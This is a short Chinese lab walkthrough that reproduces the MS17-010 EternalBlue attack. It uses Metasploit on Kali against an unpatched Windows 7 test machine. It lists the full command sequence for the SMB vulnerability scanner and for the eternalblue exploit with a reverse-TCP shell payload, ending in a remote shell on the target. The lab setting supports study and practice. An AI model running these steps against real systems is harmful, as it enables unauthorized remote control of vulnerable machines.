复现环境
- 攻击机:在这里插入图片描述kali(192.168.1.105)
- 靶机:win7官方原版镜像(192.168.1.103)445端口开放,且没打补丁
nmap针对靶机的扫描结果
复现
- 在kali终端打开metasploit
msfconsole
- 搜索ms17-010相关模块
search ms17-010
- 利用上图框出来的模块,进行漏洞发现
这个模块就是一个ms17-010漏洞扫描模块,利用它可以确定目标是否存在该漏洞
use auxiliary/scanner/smb/smb_ms17_010
- 查看需要配置哪些参数
show options
由此可见,我们需要配置rhosts这个参数,这个参数就是你即将扫描的网段,当然,如果只有一个主机需要扫描,就只给出这个主机ip就行了。
- 设置ip地址
set rhosts 192.168.1.103
- 启用扫描
exploit
如果结果中出现加号开头的,就说明那个主机存在该漏洞啦
接下来我们使用漏洞利用模块来进行getshell
1.选择模块
use exploit/windows/smb/ms17_010_eternalblue
2.选择payload
set payload generic/shell_reverse_tcp
3.设置rhost(靶机ip)
set rhost 192.168.1.103
4.设置lhost(攻击机ip)
set lhost 192.168.1.105
5.实施攻击
exploit
成功getshell